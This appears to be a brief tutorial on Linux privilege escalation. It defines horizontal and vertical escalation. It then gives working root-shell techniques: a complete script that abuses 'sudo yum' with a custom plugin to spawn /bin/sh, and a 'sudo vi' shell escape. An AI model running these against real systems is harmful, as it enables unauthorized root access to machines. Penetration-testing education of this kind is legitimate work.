Linux privilege escalation can be very difficult to explore, here I will explain what linux privesc is and how you can do it manually or using tools to gather information about the system and suggest public exploits based on system Kernel version or misconfiguration.
What is Linux Privilege Escalation?
Privesc is the process of getting more access in the system then our current user.
If a low privilege user can read, write or execute a script with root permissions the user can use this to escalate privileges and get a root shell. Many times sysadmins left scripts or processes running into the system without a proper configuration with root access.
Types of Privilege Escalation
Horizontal privilege escalation
This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. For instance, a normal user hijacking another normal user (rather than elevating to super user).
Vertical privilege escalation
This is where you attempt to gain higher privileges or access, with an existing account that you have already compromised.
For local privilege escalation attacks this might mean hijacking an account with administrator privileges or root privileges.
Exploiting Writeable /etc/passwd
Elevate privileges using yum
RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $RFS/x --enableplugin=y
Escaping VI Editor
sudo -l
sudo vi
:!sh